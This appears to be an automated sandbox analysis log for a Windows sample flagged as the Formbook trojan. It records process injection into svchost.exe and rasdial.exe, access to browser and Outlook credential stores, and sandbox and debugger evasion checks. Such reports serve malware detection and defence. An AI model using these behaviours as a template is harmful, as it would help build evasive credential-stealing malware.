Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04D15130 appears 58 times
Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04CCB970 appears 262 times
Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04D27E54 appears 99 times
Source: C:\Windows\SysWOW64\rasdial.exe Code function: String function: 04D5F290 appears 103 times
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: String function: 0008F9F2 appears 31 times
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: String function: 00090A30 appears 46 times
Source: 031215-Revised-01.exe, 00000000.00000003.1720855921.0000000003DB3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 031215-Revised-01.exe
Source: 031215-Revised-01.exe, 00000000.00000003.1722290106.0000000003F5D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 031215-Revised-01.exe
Source: 031215-Revised-01.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23), matched in the following sources:
Source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
Source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@10/9
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000E37B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000D10BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000E51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000FA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000E648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\031215-Revised-01.exe Code function: 0_2_000742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\031215-Revised-01.exe File created: C:\Users\user\AppData\Local\Temp\autD41E.tmp
Source: 031215-Revised-01.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\031215-Revised-01.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: rasdial.exe, 00000006.00000003.2268324117.00000000030D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.00000000030D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 031215-Revised-01.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\031215-Revised-01.exe "C:\Users\user\Desktop\031215-Revised-01.exe"
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"Jump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 031215-Revised-01.exeStatic file information: File size 1276416 > 1048576
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005677957.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3518322443.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.3520253093.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000000.2155169663.000000000348C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000A95C000.00000004.80000000.00040000.00000000.sdmp
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 031215-Revised-01.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000742DE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00090A76 push ecx; ret 0_2_00090A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02694833 push ss; retf 1_2_02694842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0269389F push FFFFFFA4h; ret 1_2_026938AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02692100 push edi; iretd 1_2_02692101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02683110 push eax; ret 1_2_02683112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268A987 push ebp; ret 1_2_0268A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02693FF7 push ss; retf 1_2_0269403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02697FAD push esp; iretd 1_2_02697FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02697CE3 push eax; ret 1_2_02697CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310225F pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031027FA pushad ; ret 1_2_031027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx1_2_031309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310283D push eax; iretd 1_2_03102858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310135E push eax; iretd 1_2_03101369
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA27FA pushad ; ret 6_2_04CA27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA225F pushad ; ret 6_2_04CA27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA283D push eax; iretd 6_2_04CA2858
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD09AD push ecx; mov dword ptr [esp], ecx6_2_04CD09B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA1200 push edx; retf 0004h6_2_04CA1206
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA18A7 push ds; retf 6_2_04CA198E
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA19DB push 262804DCh; retf 6_2_04CA19EA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA9939 push es; iretd 6_2_04CA9940
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA1BC7 push eax; retf 6_2_04CA1BBE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC078C push FFFFFFA4h; ret 6_2_02BC079A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC4BD0 push eax; ret 6_2_02BC4BD1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC4E9A push esp; iretd 6_2_02BC4EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBEFED push edi; iretd 6_2_02BBEFEE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD12B6 pushad ; ret 6_2_02BD12F3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC1720 push ss; retf 6_2_02BC172F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC9BBE push ss; ret 6_2_02BC9C63
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BB787F push ebp; ret 6_2_02BB7888
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0008F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0008F98E
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00101C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00101C41
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\031215-Revised-01.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-96610)
Source: C:\Users\user\Desktop\031215-Revised-01.exe | API/Special instruction interceptor: Address: 1393264
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\rasdial.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E rdtsc 1_2_0317096E
Source: C:\Windows\SysWOW64\rasdial.exe | Window / User API: threadDelayed 9840
Source: C:\Users\user\Desktop\031215-Revised-01.exe | API coverage: 4.1 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\rasdial.exe | API coverage: 2.7 %
Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012 | Thread sleep count: 132 > 30
Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012 | Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012 | Thread sleep count: 9840 > 30
Source: C:\Windows\SysWOW64\rasdial.exe TID: 8012 | Thread sleep time: -19680000s >= -30000s
Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe TID: 8064 | Thread sleep time: -50000s >= -30000s
Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe TID: 8064 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\rasdial.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rasdial.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_000DDBBE
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E68EE FindFirstFileW,FindClose, 0_2_000E68EE
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_000E698F
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_000DD076
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_000DD3A9
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000E9642
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000E979D
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_000E9B2B
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000E5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_000E5C97
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02BCC420 FindFirstFileW,FindNextFileW,FindClose, 6_2_02BCC420
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000742DE
Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519091171.000000000145F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: rasdial.exe, 00000006.00000002.3518674647.0000000003059000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000009.00000002.2374302479.0000016F0A98C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rasdial.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E rdtsc 1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_026974F3 LdrLoadDll, 1_2_026974F3
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000EEAA2 BlockInput, 0_2_000EEAA2
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_000A2622
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_000742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000742DE
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_00094CE8 mov eax, dword ptr fs:[00000030h] 0_2_00094CE8
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_01393530 mov eax, dword ptr fs:[00000030h] 0_2_01393530
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_013934D0 mov eax, dword ptr fs:[00000030h] 0_2_013934D0
Source: C:\Users\user\Desktop\031215-Revised-01.exe | Code function: 0_2_01391E70 mov eax, dword ptr fs:[00000030h] 0_2_01391E70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h] 1_2_0312C310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h] 1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h] 1_2_03208324
